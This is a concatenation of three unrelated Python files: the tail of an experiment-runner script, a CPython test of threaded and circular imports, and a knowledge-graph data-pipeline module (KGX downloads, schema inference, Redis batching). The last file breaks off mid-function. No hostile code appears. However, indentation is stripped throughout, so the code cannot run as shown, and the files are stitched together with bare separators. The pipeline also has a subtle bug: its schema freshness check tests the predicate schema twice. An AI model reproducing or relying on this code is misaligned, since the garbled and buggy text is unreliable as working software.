print("\nhttp://{host}:9000/?host={host}&after={after}&before={before}&start_time={start_time}&ns_inst_time={ns_inst_time}&ns_inst_end_time={ns_inst_end_time}&ns_term_start_time={ns_term_start_time}&ns_term_end_time={ns_term_end_time}&end_time={end_time}&exp_description={exp_description}".format(host=HOST_URL, after=experiment_timestamps["start_time"], before=experiment_timestamps["end_time"],start_time=experiment_timestamps["start_time"],ns_inst_time=experiment_timestamps["ns_inst_time"],ns_inst_end_time=experiment_timestamps["ns_inst_end_time"],ns_term_start_time=experiment_timestamps["ns_term_start_time"],ns_term_end_time=experiment_timestamps["ns_term_end_time"],end_time=experiment_timestamps["end_time"],exp_description=NSDESCRIPTION))
print("\nhttp://{host}:9000/interactive?host={host}&after={after}&before={before}&start_time={start_time}&ns_inst_time={ns_inst_time}&ns_inst_end_time={ns_inst_end_time}&ns_term_start_time={ns_term_start_time}&ns_term_end_time={ns_term_end_time}&end_time={end_time}&exp_description={exp_description}".format(host=HOST_URL, after=experiment_timestamps["start_time"], before=experiment_timestamps["end_time"],start_time=experiment_timestamps["start_time"],ns_inst_time=experiment_timestamps["ns_inst_time"],ns_inst_end_time=experiment_timestamps["ns_inst_end_time"],ns_term_start_time=experiment_timestamps["ns_term_start_time"],ns_term_end_time=experiment_timestamps["ns_term_end_time"],end_time=experiment_timestamps["end_time"],exp_description=NSDESCRIPTION))
print("\n\n\n\n\n\n ENDED \n\n\n\n\n\n")
if experiment_complete:
os.rename(nit, "{nit}-Complete".format(nit=nit))
else:
os.rename(nit, "{nit}-{active}".format(nit=nit, active=experiment_missing))
# delete_stacks()
remove_requests()
restart_pishahang()
time.sleep(INTER_EXPERIMENT_SLEEP)
|
test_threaded_import.py
|
# This is a variant of the very old (early 90's) file
# Demo/threads/bug.py. It simply provokes a number of threads into
# trying to import the same module "at the same time".
# There are no pleasant failure modes -- most likely is that Python
# complains several times about module random having no attribute
# randrange, and then Python hangs.
import _imp as imp
import os
import importlib
import sys
import time
import shutil
import unittest
from test.support import (
verbose, import_module, run_unittest, TESTFN, reap_threads,
forget, unlink, rmtree)
threading = import_module('threading')
def task(N, done, done_tasks, errors):
try:
# We don't use modulefinder but still import it in order to stress
# importing of different modules from several threads.
if len(done_tasks) % 2:
import modulefinder
import random
else:
import random
import modulefinder
# This will fail if random is not completely initialized
x = random.randrange(1, 3)
except Exception as e:
errors.append(e.with_traceback(None))
finally:
done_tasks.append(threading.get_ident())
finished = len(done_tasks) == N
if finished:
done.set()
# Create a circular import structure: A -> C -> B -> D -> A
# NOTE: `time` is already loaded and therefore doesn't threaten to deadlock.
circular_imports_modules = {
'A': """if 1:
import time
time.sleep(%(delay)s)
x = 'a'
import C
""",
'B': """if 1:
import time
time.sleep(%(delay)s)
x = 'b'
import D
""",
'C': """import B""",
'D': """import A""",
}
class Finder:
"""A dummy finder to detect concurrent access to its find_spec()
method."""
def __init__(self):
self.numcalls = 0
self.x = 0
self.lock = threading.Lock()
def find_spec(self, name, path=None, target=None):
# Simulate some thread-unsafe behaviour. If calls to find_spec()
# are properly serialized, `x` will end up the same as `numcalls`.
# Otherwise not.
assert imp.lock_held()
with self.lock:
self.numcalls += 1
x = self.x
time.sleep(0.01)
self.x = x + 1
class FlushingFinder:
"""A dummy finder which flushes sys.path_importer_cache when it gets
called."""
def find_spec(self, name, path=None, target=None):
sys.path_importer_cache.clear()
class ThreadedImportTests(unittest.TestCase):
def setUp(self):
self.old_random = sys.modules.pop('random', None)
def tearDown(self):
# If the `random` module was already initialized, we restore the
# old module at the end so that pickling tests don't fail.
# See http://bugs.python.org/issue3657#msg110461
if self.old_random is not None:
sys.modules['random'] = self.old_random
def check_parallel_module_init(self):
if imp.lock_held():
# This triggers on, e.g., from test import autotest.
raise unittest.SkipTest("can't run when import lock is held")
done = threading.Event()
for N in (20, 50) * 3:
if verbose:
print("Trying", N, "threads ...", end=' ')
# Make sure that random and modulefinder get reimported freshly
for modname in ['random', 'modulefinder']:
try:
del sys.modules[modname]
except KeyError:
pass
errors = []
done_tasks = []
done.clear()
t0 = time.monotonic()
for i in range(N):
t = threading.Thread(target=task,
args=(N, done, done_tasks, errors,))
t.start()
completed = done.wait(10 * 60)
dt = time.monotonic() - t0
if verbose:
print("%.1f ms" % (dt*1e3), flush=True, end=" ")
dbg_info = 'done: %s/%s' % (len(done_tasks), N)
self.assertFalse(errors, dbg_info)
self.assertTrue(completed, dbg_info)
if verbose:
print("OK.")
def test_parallel_module_init(self):
self.check_parallel_module_init()
def test_parallel_meta_path(self):
finder = Finder()
sys.meta_path.insert(0, finder)
try:
self.check_parallel_module_init()
self.assertGreater(finder.numcalls, 0)
self.assertEqual(finder.x, finder.numcalls)
finally:
sys.meta_path.remove(finder)
def test_parallel_path_hooks(self):
# Here the Finder instance is only used to check concurrent calls
# to path_hook().
finder = Finder()
# In order for our path hook to be called at each import, we need
# to flush the path_importer_cache, which we do by registering a
# dedicated meta_path entry.
flushing_finder = FlushingFinder()
def path_hook(path):
finder.find_spec('')
raise ImportError
sys.path_hooks.insert(0, path_hook)
sys.meta_path.append(flushing_finder)
try:
# Flush the cache a first time
flushing_finder.find_spec('')
numtests = self.check_parallel_module_init()
self.assertGreater(finder.numcalls, 0)
self.assertEqual(finder.x, finder.numcalls)
finally:
sys.meta_path.remove(flushing_finder)
sys.path_hooks.remove(path_hook)
def test_import_hangers(self):
# In case this test is run again, make sure the helper module
# gets loaded from scratch again.
try:
del sys.modules['test.threaded_import_hangers']
except KeyError:
pass
import test.threaded_import_hangers
self.assertFalse(test.threaded_import_hangers.errors)
def test_circular_imports(self):
# The goal of this test is to exercise implementations of the import
# lock which use a per-module lock, rather than a global lock.
# In these implementations, there is a possible deadlock with
# circular imports, for example:
# - thread 1 imports A (grabbing the lock for A) which imports B
# - thread 2 imports B (grabbing the lock for B) which imports A
# Such implementations should be able to detect such situations and
# resolve them one way or the other, without freezing.
# NOTE: our test constructs a slightly less trivial import cycle,
# in order to better stress the deadlock avoidance mechanism.
delay = 0.5
os.mkdir(TESTFN)
self.addCleanup(shutil.rmtree, TESTFN)
sys.path.insert(0, TESTFN)
self.addCleanup(sys.path.remove, TESTFN)
for name, contents in circular_imports_modules.items():
contents = contents % {'delay': delay}
with open(os.path.join(TESTFN, name + ".py"), "wb") as f:
f.write(contents.encode('utf-8'))
self.addCleanup(forget, name)
importlib.invalidate_caches()
results = []
def import_ab():
import A
results.append(getattr(A, 'x', None))
def import_ba():
import B
results.append(getattr(B, 'x', None))
t1 = threading.Thread(target=import_ab)
t2 = threading.Thread(target=import_ba)
t1.start()
t2.start()
t1.join()
t2.join()
self.assertEqual(set(results), {'a', 'b'})
def test_side_effect_import(self):
code = """if 1:
import threading
def target():
import random
t = threading.Thread(target=target)
t.start()
t.join()"""
sys.path.insert(0, os.curdir)
self.addCleanup(sys.path.remove, os.curdir)
filename = TESTFN + ".py"
with open(filename, "wb") as f:
f.write(code.encode('utf-8'))
self.addCleanup(unlink, filename)
self.addCleanup(forget, TESTFN)
self.addCleanup(rmtree, '__pycache__')
importlib.invalidate_caches()
__import__(TESTFN)
@reap_threads
def test_main():
old_switchinterval = None
try:
old_switchinterval = sys.getswitchinterval()
sys.setswitchinterval(1e-5)
except AttributeError:
pass
try:
run_unittest(ThreadedImportTests)
finally:
if old_switchinterval is not None:
sys.setswitchinterval(old_switchinterval)
if __name__ == "__main__":
test_main()
|
core.py
|
import argparse
import glob
import os
import orjson as json
import ntpath
import pathlib
import queue
import redis
import requests
import shutil
import sys
import threading
import time
import yaml
import pickle
from bmt import Toolkit
from collections import defaultdict
from enum import Enum
from io import StringIO
from kgx.utils.kgx_utils import prepare_data_dict as kgx_merge_dict
from roger import ROGER_DATA_DIR
from roger.Config import get_default_config as get_config
from roger.roger_util import get_logger
from roger.components.data_conversion_utils import TypeConversionUtil
from redisgraph_bulk_loader.bulk_insert import bulk_insert
from roger.roger_db import RedisGraph
from string import Template
from urllib.request import urlretrieve
log = get_logger ()
config = get_config ()
class SchemaType(Enum):
""" High level semantic metatdata concepts.
Categories are classes in an ontological model like Biolink.
Predicates are links between nodes. """
CATEGORY = "category"
PREDICATE = "predicate"
class FileFormat(Enum):
""" File formats this module knows about. """
JSON = "json"
YAML = "yaml"
# @TODO move this to a shared file between dug, roger, etc...
class Util:
@staticmethod
def current_time_in_millis():
"""
Get current time in milliseconds.
Returns
-------
int
Time in milliseconds
"""
return int(round(time.time() * 1000))
""" A just do it approach to getting data. """
@staticmethod
def read_file(path):
""" Read a file.
:param path: Path to a file.
"""
text = None
with open(path, "r") as stream:
text = stream.read ()
return text
@staticmethod
def read_url(url):
""" Read data from a URL.
:param url: The URL to read. """
return requests.get (url).text
@staticmethod
def read_data(path):
""" Read data from a URL or File. HTTP(S) is the only supported protocol.
:param path: A URL or file path. """
text = None
if Util.is_web(path):
text = Util.read_url (path)
else:
text = Util.read_file (path)
return text
@staticmethod
def read_object(path, key=None):
""" Read on object from a path.
:param path: A URL or file path. Supports YAML and JSON depending on extension.
:param key: A configuration key. This is prepended to the path if present.
:raises ValueError: If the key is not in the configuration. """
if key is not None:
prefix = config[key]
path = f"{prefix}/{path}" if Util.is_web(prefix) \
else os.path.join (prefix, path)
obj = None
if path.endswith (".yaml") or path.endswith (".yml"):
obj = yaml.safe_load (Util.read_data (path))
elif path.endswith (".json"):
obj = json.loads (Util.read_data (path))
elif path.endswith(".pickle"):
with open(file=path, mode="rb") as stream:
obj = pickle.load(stream)
elif path.endswith(".jsonl"):
obj = Util.read_data(path)
return obj
@staticmethod
def is_web (uri):
""" The URI is a web URI (starts with http or https).
:param uri: A URI """
return uri.startswith("http://") or uri.startswith ("https://")
@staticmethod
def write_object (obj, path, key=None):
""" Write an object to a path. YAML and JSON supported based on extension.
:param obj: The object to write.
:param path: The path to write to.
:param key: The configuration key to prepend to the path.
"""
""" Prepend a prefix from the configuration file if a key is given. """
if key is not None:
prefix = config[key]
path = f"{prefix}/{path}" if Util.is_web(prefix) \
else os.path.join (prefix, path)
""" Ensure the directory to be written to exists. """
dirname = os.path.dirname (path)
if not os.path.exists (dirname):
os.makedirs (dirname, exist_ok=True)
""" Write the file in the specified format. """
if path.endswith (".yaml") or path.endswith (".yml"):
with open(path, 'w') as outfile:
yaml.dump (obj, outfile)
elif path.endswith (".json"):
with open (path, "w") as stream:
stream.write(str(json.dumps (obj).decode('utf-8')))
elif path.endswith(".pickle"):
with open (path, "wb") as stream:
pickle.dump(obj, file=stream)
elif path.endswith(".jsonl"):
with open (path, "w", encoding="utf-8") as stream:
stream.write(obj)
else:
""" Raise an exception if invalid. """
raise ValueError (f"Unrecognized extension: {path}")
@staticmethod
def kgx_path (name):
""" Form a KGX object path.
:path name: Name of the KGX object. """
return str(ROGER_DATA_DIR / "kgx" / name)
@staticmethod
def kgx_objects (format="json"):
""" A list of KGX objects. """
kgx_pattern = Util.kgx_path(f"**.{format}")
return sorted(glob.glob (kgx_pattern))
@staticmethod
def merge_path (name):
""" Form a merged KGX object path.
:path name: Name of the merged KGX object. """
return str(ROGER_DATA_DIR / 'merge' / name)
@staticmethod
def merged_objects ():
""" A list of merged KGX objects. """
merged_pattern = Util.merge_path("**.json")
return sorted(glob.glob (merged_pattern))
@staticmethod
def schema_path (name):
""" Path to a schema object.
:param name: Name of the object to get a path for. """
return str(ROGER_DATA_DIR / 'schema' / name)
@staticmethod
def bulk_path (name):
""" Path to a bulk load object.
:param name: Name of the object. """
return str(ROGER_DATA_DIR / 'bulk' / name)
@staticmethod
def metrics_path (name):
"""
Path to write metrics to
:param name:
:return:
"""
return str(ROGER_DATA_DIR / "metrics" / name)
@staticmethod
def dug_kgx_path(name):
return str(ROGER_DATA_DIR / "dug" / "kgx" / name)
@staticmethod
def dug_annotation_path(name):
return str(ROGER_DATA_DIR / "dug" / "annotations" / name)
@staticmethod
def dug_expanded_concepts_path(name):
return str(ROGER_DATA_DIR / 'dug' / 'expanded_concepts' / name)
@staticmethod
def dug_expanded_concept_objects():
file_pattern = Util.dug_expanded_concepts_path(os.path.join('*','expanded_concepts.pickle'))
return sorted(glob.glob(file_pattern))
@staticmethod
def dug_crawl_path(name):
return str(ROGER_DATA_DIR / 'dug' / 'crawl' / name)
@staticmethod
def dug_kgx_objects():
""" A list of dug KGX objects. """
dug_kgx_pattern = Util.dug_kgx_path("**.json")
return sorted(glob.glob(dug_kgx_pattern))
@staticmethod
def dug_concepts_objects():
""" A list of dug annotation Objects. """
concepts_file_path = Util.dug_annotation_path(os.path.join('*','concepts.pickle'))
return sorted(glob.glob(concepts_file_path))
@staticmethod
def dug_elements_objects():
""" A list of dug annotation Objects. """
concepts_file_path = Util.dug_annotation_path(os.path.join('*', 'elements.pickle'))
return sorted(glob.glob(concepts_file_path))
@staticmethod
def dug_input_files_path(name) -> pathlib.Path:
path = ROGER_DATA_DIR / "dug" / "input_files" / name
if not path.exists():
log.info(f"Input file path: {path} does not exist, creating")
path.mkdir(parents=True, exist_ok=True)
else:
log.info(f"Input file path: {path} already exists")
return path
@staticmethod
def mkdir(path, is_dir=False):
directory = os.path.dirname(path) if not is_dir else path
if not os.path.exists(directory):
os.makedirs(directory)
@staticmethod
def remove(path):
if os.path.exists(path):
if os.path.isdir(path):
shutil.rmtree(path)
else:
os.remove(path)
@staticmethod
def clear_dir(path):
Util.remove(path)
Util.mkdir(path, is_dir=True)
@staticmethod
def dug_topmed_path(name):
""" Topmed source files"""
return Util.dug_input_files_path('topmed') / name
@staticmethod
def dug_topmed_objects():
topmed_file_pattern = str(Util.dug_topmed_path("topmed_*.csv"))
return sorted(glob.glob(topmed_file_pattern))
@staticmethod
def dug_nida_path(name):
""" NIDA source files"""
return Util.dug_input_files_path('nida') / name
@staticmethod
def dug_nida_objects():
nida_file_pattern = str(Util.dug_nida_path("NIDA-*.xml"))
return sorted(glob.glob(nida_file_pattern))
@staticmethod
def dug_dd_xml_path():
""" Topmed source files"""
return Util.dug_input_files_path('db_gap')
@staticmethod
def get_files_recursive(file_name_filter, current_dir):
file_paths = []
for child in current_dir.iterdir():
if child.is_dir():
file_paths += Util.get_files_recursive(file_name_filter, child)
continue
if not file_name_filter(child.name):
continue
else:
file_paths += [child]
return file_paths
@staticmethod
def dug_dd_xml_objects():
file_path = Util.dug_dd_xml_path()
files = Util.get_files_recursive(lambda file_name: not file_name.startswith('._') and file_name.endswith('.xml'), file_path)
return sorted([str(f) for f in files])
@staticmethod
def copy_file_to_dir(file_location, dir_name):
return shutil.copy(file_location, dir_name)
@staticmethod
def read_schema (schema_type: SchemaType):
""" Read a schema object.
:param schema_type: Schema type of the object to read. """
path = Util.schema_path (f"{schema_type.value}-schema.json")
return Util.read_object (path)
@staticmethod
def get_uri (path, key):
""" Build a URI.
:param path: The path of an object.
:param key: The key of a configuration value to prepend to the object. """
        # In case the configured base URL has a trailing slash (http://.../) or
        # not (http://...), strip it and add it back to avoid a double slash.
root_url = config[key].rstrip('/')
return f"{root_url}/{path}"
@staticmethod
def get_relative_path (path):
return os.path.join (os.path.dirname (__file__), path)
@staticmethod
def read_relative_object (path):
return Util.read_object (Util.get_relative_path(path))
@staticmethod
def trunc(text, limit):
return ('..' + text[-limit-2:]) if len(text) > limit else text
@staticmethod
def is_up_to_date (source, targets):
target_time_list = [ os.stat (f).st_mtime for f in targets if os.path.exists(f) ]
if len(target_time_list) == 0:
log.debug (f"no targets found")
return False
source = [ os.stat (f).st_mtime for f in source if os.path.exists (f) ]
if len(source) == 0:
log.debug ("no source found. up to date")
return True
return max(source) < min(target_time_list)
@staticmethod
def json_line_iter(jsonl_file_path):
        # Use a context manager so the file is closed even if the generator is
        # not fully consumed.
        with open(file=jsonl_file_path, mode='r', encoding='utf-8') as f:
            for line in f:
                yield json.loads(line)
@staticmethod
def downloadfile(thread_num, inputq, doneq):
url = ""
t0 = 0
pct = 0
def downloadprogress(blocknumber, readsize, totalfilesize):
nonlocal thread_num
nonlocal url, t0, pct
blocks_expected = int(totalfilesize/readsize) + (1 if totalfilesize%readsize != 0 else 0)
t1 = int(Util.current_time_in_millis()/1000)
elapsed_delta = t1 - t0
pct = int(100 * blocknumber / blocks_expected)
if elapsed_delta >= 30: # every n seconds
log.info(f"thread-{thread_num} {pct}% of size:{totalfilesize} ({blocknumber}/{blocks_expected}) url:{url}")
t0 = t1
num_files_processed = 0
while inputq.empty() is False:
t0 = int(Util.current_time_in_millis()/1000)
url, dst = inputq.get()
num_files_processed += 1
log.info(f"thread-{thread_num} downloading {url}")
try:
path, httpMessage = urlretrieve(url, dst, reporthook=downloadprogress)
if pct < 100:
httpMessageKeys = httpMessage.keys()
log.info(f"thread-{thread_num} urlretrieve path:'{path}' http-keys:{httpMessageKeys} httpMessage:'{httpMessage.as_string()}")
except Exception as e:
log.error(f"thread-{thread_num} downloadfile excepton: {e}")
continue
log.info(f"thread-{thread_num} downloaded {dst}")
doneq.put((thread_num,num_files_processed))
log.info(f"thread-{thread_num} done!")
return
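# A minimal usage sketch for the Util helpers above (illustrative only; not
# called from this module). The file names are made up for the example; the
# "kgx_base_data_uri" key is the same configuration key used by KGXModel
# below.
def _example_util_usage():
    # Build a URL under the configured base URI without a doubled slash.
    url = Util.get_uri("v1.0/graph.json", "kgx_base_data_uri")
    # Read an object; the parser is chosen by the file extension.
    metadata = Util.read_object("metadata.yaml", key="kgx_base_data_uri")
    # Write it back out locally as JSON under the KGX data directory.
    out_path = Util.kgx_path("metadata.json")
    Util.write_object(metadata, out_path)
    # True when the targets are newer than the sources, so work can be skipped.
    fresh = Util.is_up_to_date([out_path], [Util.merge_path("metadata.json")])
    return url, fresh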
class KGXModel:
""" Abstractions for transforming Knowledge Graph Exchange formatted data. """
def __init__(self, biolink=None, config=None):
if not config:
config = get_config()
self.config = config
self.biolink_version = self.config.kgx.biolink_model_version
log.debug(f"Trying to get biolink version : {self.biolink_version}")
        if biolink is None:
self.biolink = BiolinkModel(self.biolink_version)
else:
self.biolink = biolink
self.redis_conn = redis.Redis(
host=self.config.redisgraph.host,
port=self.config.redisgraph.port,
password=self.config.redisgraph.password,
db=1) # uses db1 for isolation @TODO make this config param.
self.enable_metrics = self.config.get('enable_metrics', False)
def get_kgx_json_format(self, files: list, dataset_version: str):
"""
        Gets JSON formatted KGX files. These files have the following structure:
        {"nodes": [{"id": "..."}, ...], "edges": [{"id": "..."}, ...]}
Parameters
----------
files : list of file names
dataset_version : dataset version from dataset meta-data information
Returns None
-------
"""
file_tuple_q = queue.Queue()
thread_done_q = queue.Queue()
for nfile, file_name in enumerate(files):
# file_url or skip
file_name = dataset_version + "/" + file_name
file_url = Util.get_uri(file_name, "kgx_base_data_uri")
subgraph_basename = os.path.basename(file_name)
subgraph_path = Util.kgx_path(subgraph_basename)
if os.path.exists(subgraph_path):
log.info(f"cached kgx: {subgraph_path}")
continue
log.debug ("#{}/{} to get: {}".format(nfile+1, len(files), file_url))
# folder
dirname = os.path.dirname (subgraph_path)
if not os.path.exists (dirname):
os.makedirs (dirname, exist_ok=True)
# add to queue
file_tuple_q.put((file_url,subgraph_path))
# start threads for each file download
threads = []
for thread_num in range(file_tuple_q.qsize()):
th = threading.Thread(target=Util.downloadfile, args=(thread_num, file_tuple_q, thread_done_q))
th.start()
threads.append(th)
# wait for each thread to complete
for nwait in range(len(threads)):
thread_num, num_files_processed = thread_done_q.get()
th = threads[thread_num]
th.join()
log.info(f"#{nwait+1}/{len(threads)} joined: thread-{thread_num} processed: {num_files_processed} file(s)")
all_kgx_files = []
for nfile, file_name in enumerate(files):
start = Util.current_time_in_millis()
file_name = dataset_version + "/" + file_name
file_url = Util.get_uri(file_name, "kgx_base_data_uri")
subgraph_basename = os.path.basename(file_name)
subgraph_path = Util.kgx_path(subgraph_basename)
all_kgx_files.append(subgraph_path)
if os.path.exists(subgraph_path):
log.info(f"cached kgx: {subgraph_path}")
continue
log.info ("#{}/{} read: {}".format(nfile+1, len(files), file_url))
subgraph = Util.read_object(file_url)
Util.write_object(subgraph, subgraph_path)
total_time = Util.current_time_in_millis() - start
edges = len(subgraph['edges'])
nodes = len(subgraph['nodes'])
log.info("#{}/{} edges:{:>7} nodes: {:>7} time:{:>8} wrote: {}".format(
nfile+1, len(files), edges, nodes, total_time/1000, subgraph_path))
return all_kgx_files
def get_kgx_jsonl_format(self, files, dataset_version):
"""
Gets pairs of jsonl formatted kgx files. `files` is expected to contain complete
pairs, i.e. if kgx_1_nodes.jsonl exists, kgx_1_edges.jsonl is expected to exist
in the same path.
File names should contain the strings *nodes*.jsonl and *edges*.jsonl.
Parameters
----------
files : list of jsonl file names (node/edge pairs)
dataset_version : dataset version from dataset meta-data information
Returns
-------
list of local paths to the downloaded kgx files
"""
# make a paired list
paired_up = []
log.info(f"getting {files}")
for file_name in files:
if "nodes" in file_name:
paired_up.append([file_name, file_name.replace('nodes', 'edges')])
error = False
# validate that all pairs exist
if len(files) / 2 != len(paired_up):
log.error("Error paired up kgx jsonl files don't match list of files specified in metadata.yaml")
error = True
for pairs in paired_up:
if pairs[0] not in files:
log.error(f"{pairs[0]} not in original list of files from metadata.yaml")
error = True
if pairs[1] not in files:
error = True
log.error(f"{pairs[1]} not in original list of files from metadata.yaml")
if error:
raise Exception("Metadata.yaml has inconsistent jsonl files")
file_tuple_q = queue.Queue()
thread_done_q = queue.Queue()
for npairs, pairs in enumerate(paired_up):
for npair, p in enumerate(pairs):
file_name = dataset_version + "/" + p
file_url = Util.get_uri(file_name, "kgx_base_data_uri")
subgraph_basename = os.path.basename(file_name)
subgraph_path = Util.kgx_path(subgraph_basename)
if os.path.exists(subgraph_path):
log.info(f"skip cached kgx: {subgraph_path}")
continue
log.info ("#{}.{}/{} read: {}".format(npairs+1, npair+1, len(paired_up), file_url))
# folder
dirname = os.path.dirname (subgraph_path)
if not os.path.exists (dirname):
os.makedirs (dirname, exist_ok=True)
# add to queue
file_tuple_q.put((file_url,subgraph_path))
# start threads for each file download
threads = []
for thread_num in range(file_tuple_q.qsize()):
th = threading.Thread(target=Util.downloadfile, args=(thread_num, file_tuple_q, thread_done_q))
th.start()
threads.append(th)
# wait for each thread to complete
for nwait in range(len(threads)):
thread_num, num_files_processed = thread_done_q.get()
th = threads[thread_num]
th.join()
log.info(f"#{nwait+1}/{len(threads)} joined: thread-{thread_num} processed: {num_files_processed} file(s)")
all_kgx_files = []
for pairs in paired_up:
nodes = 0
edges = 0
start = Util.current_time_in_millis()
for p in pairs:
file_name = dataset_version + "/" + p
file_url = Util.get_uri(file_name, "kgx_base_data_uri")
subgraph_basename = os.path.basename(file_name)
subgraph_path = Util.kgx_path(subgraph_basename)
all_kgx_files.append(subgraph_path)
if os.path.exists(subgraph_path):
log.info(f"cached kgx: {subgraph_path}")
continue
data = Util.read_object(file_url)
Util.write_object(data, subgraph_path)
if "edges" in p:
edges = len(data.split('\n'))
else:
nodes = len(data.split('\n'))
total_time = Util.current_time_in_millis() - start
log.info("wrote {:>45}: edges:{:>7} nodes: {:>7} time:{:>8}".format(
Util.trunc(subgraph_path, 45), edges, nodes, total_time))
return all_kgx_files
def get (self, dataset_version = "v1.0"):
""" Read metadata for KGX files and downloads them locally.
:param dataset_version: Data version to operate on.
"""
metadata = Util.read_relative_object ("../metadata.yaml")
data_set_list = self.config.kgx.data_sets
for item in metadata['kgx']['versions']:
if item['version'] == dataset_version and item['name'] in data_set_list:
log.info(f"Getting KGX dataset {item['name']} , version {item['version']}")
if item['format'] == 'json':
kgx_files_remote = self.get_kgx_json_format(item['files'], item['version'])
elif item['format'] == 'jsonl':
kgx_files_remote = self.get_kgx_jsonl_format(item['files'], item['version'])
else:
raise ValueError(f"Unrecognized format in metadata.yaml: {item['format']}, valid formats are `json` "
f"and `jsonl`.")
# Fetches kgx generated from the Dug annotation workflow.
new_files = self.fetch_dug_kgx() + kgx_files_remote
all_files_in_dir = Util.kgx_objects(format="json") + Util.kgx_objects(format="jsonl")
files_to_remove = [x for x in all_files_in_dir if x not in new_files]
if len(files_to_remove):
log.info(f"Found some old files to remove from kgx dir : {files_to_remove}")
for file in files_to_remove:
Util.remove(file)
log.info(f"removed {file}")
log.info("Done.")
def fetch_dug_kgx(self):
"""
Copies files from dug output dir to roger kgx dir.
:return:
"""
dug_kgx_files = Util.dug_kgx_objects()
all_kgx_files = []
log.info(f"Copying dug KGX files to {Util.kgx_path('')}. Found {len(dug_kgx_files)} kgx files to copy.")
for file in dug_kgx_files:
file_name = ntpath.basename(file)
dest = Util.kgx_path(file_name)
all_kgx_files.append(dest)
Util.write_object({}, dest)
log.info(f"Copying from {file} to {dest}.")
Util.copy_file_to_dir(file, dest)
log.info("Done copying dug KGX files.")
return all_kgx_files
def create_nodes_schema(self):
"""
Extracts schema for nodes based on biolink leaf types
:return:
"""
category_schemas = defaultdict(lambda: None)
category_error_nodes = set()
merged_nodes_file = Util.merge_path("nodes.jsonl")
log.info(f"Processing : {merged_nodes_file}")
for node in Util.json_line_iter(merged_nodes_file):
if not node['category']:
category_error_nodes.add(node['id'])
node['category'] = [BiolinkModel.root_type]
node_type = self.biolink.get_leaf_class(node['category'])
category_schemas[node_type] = category_schemas.get(node_type, {})
for k in node.keys():
current_type = type(node[k]).__name__
if k not in category_schemas[node_type]:
category_schemas[node_type][k] = current_type
else:
previous_type = category_schemas[node_type][k]
category_schemas[node_type][k] = TypeConversionUtil.compare_types(previous_type, current_type)
if len(category_error_nodes):
log.warn(f"some nodes didn't have category assigned. KGX file has errors."
f"Nodes {len(category_error_nodes)}."
f"Showing first 10: {list(category_error_nodes)[:10]}."
f"These will be treated as {BiolinkModel.root_type}.")
""" Write node schemas. """
self.write_schema(category_schemas, SchemaType.CATEGORY)
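# A sketch of what the written category schema looks like (attribute names and
# types are illustrative; the real keys depend on the input KGX files):
#   {
#     "biolink:ChemicalSubstance": {"id": "str", "name": "str", "synonyms": "list"},
#     "biolink:Disease": {"id": "str", "name": "str"}
#   }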
def create_edges_schema(self):
"""
Create unified schema for all edges in an edges jsonl file.
:return:
"""
predicate_schemas = defaultdict(lambda: None)
merged_edges_file = Util.merge_path("edges.jsonl")
""" Infer predicate schemas. """
for edge in Util.json_line_iter(merged_edges_file):
predicate = edge['predicate']
predicate_schemas[predicate] = predicate_schemas.get(predicate, {})
for k in edge.keys():
current_type = type(edge[k]).__name__
if k not in predicate_schemas[predicate]:
predicate_schemas[predicate][k] = current_type
else:
previous_type = predicate_schemas[predicate][k]
predicate_schemas[predicate][k] = TypeConversionUtil.compare_types(previous_type, current_type)
self.write_schema(predicate_schemas, SchemaType.PREDICATE)
def create_schema (self):
"""
Determine the schema of each type of object. We have to do this to make it possible
to write tabular data. Need to know all possible columns in advance and correct missing
fields.
"""
if self.schema_up_to_date():
log.info (f"schema is up to date.")
return
self.create_nodes_schema()
self.create_edges_schema()
def schema_up_to_date (self):
return Util.is_up_to_date (
source=Util.kgx_objects (),
targets=[
Util.schema_path (f"{SchemaType.PREDICATE.value}-schema.json"),
Util.schema_path (f"{SchemaType.PREDICATE.value}-schema.json")
])
def write_schema (self, schema, schema_type: SchemaType):
""" Output the schema file.
:param schema: Schema to get keys from.
:param schema_type: Type of schema to write. """
file_name = Util.schema_path (f"{schema_type.value}-schema.json")
log.info (f"writing schema: {file_name}")
dictionary = { k : v for k, v in schema.items () }
Util.write_object (dictionary, file_name)
def read_items_from_redis(self, ids):
chunk_size = 10_000 # batch for pipeline
pipeline = self.redis_conn.pipeline()
response = {}
chunked_ids = [ids[start: start + chunk_size] for start in range(0, len(ids), chunk_size)]
for ids in chunked_ids:
for i in ids:
pipeline.get(i)
result = pipeline.execute()
for i, res in zip(ids, result):
if res:
response.update({i: json.loads(res)})
return response
def write_items_to_redis(self, items):
chunk_size = 10_000 # batch for redis beyond this cap it might not be optimal, according to redis docs
pipeline = self.redis_conn.pipeline()
all_keys = list(items.keys())
chunked_keys = [all_keys[start: start + chunk_size] for start in range(0, len(all_keys), chunk_size)]
for keys in chunked_keys:
for key in keys:
pipeline.set(key, json.dumps(items[key]))
pipeline.execute()
def delete_keys(self, items):
# deletes keys
chunk_size = 10_000
pipeline = self.redis_conn.pipeline()
all_keys = list(items)
chunked_keys = [all_keys[start: start + chunk_size] for start in range(0, len(all_keys), chunk_size)]
for keys in chunked_keys:
for key in keys:
pipeline.delete(key)
pipeline.execute()
def delete_all_keys(self):
all_keys = self.redis_conn.keys("*")
log.info(f"found {len(all_keys)} to delete.")
self.delete_keys(all_keys)
log.info(f"deleted keys.")
def write_redis_back_to_jsonl(self, file_name, redis_key_pattern):
Util.mkdir(file_name)
with open(file_name, 'w', encoding='utf-8') as f:
start = time.time()
keys = self.redis_conn.keys(redis_key_pattern)
log.info(f"Grabbing {redis_key_pattern} from redis too {time.time() - start}")
chunk_size = 500_000
chunked_keys = [keys[start: start + chunk_size] for start in range(0, len(keys), chunk_size) ]
for chunk in chunked_keys:
items = self.read_items_from_redis(chunk)
self.delete_keys(chunk)
# transform them into lines
items = [json.dumps(items[x]) + '\n' for x in items]
f.writelines(items)
log.info(f"wrote : {len(items)}")
def kgx_merge_dict(self, dict_1, dict_2):
# collect values that are same first
merged = {}
# if properties match up with value treat as one
# get dict_1 intersection dict_2 ,
merged = {x: dict_1[x] for x in dict_1 if dict_1.get(x) == dict_2.get(x)}
# get dict_1 disjoint dict 2
unique_dict_1_props = {x: dict_1[x] for x in dict_1 if x not in merged.keys()}
# get dict_2 disjoint dict 1
unique_dict_2_props = {x: dict_2[x] for x in dict_2 if x not in merged.keys()}
# keep the remaining properties from both sides; for keys present in both with
# differing values, prefer the value from dict_1 (the most recently read record)
merged.update(unique_dict_2_props)
merged.update(unique_dict_1_props)
for keys in merged:
attribute = merged[keys]
# When merging arrays for bulk loading
# we have to make sure that items in lists
# don't contain single-quotes.
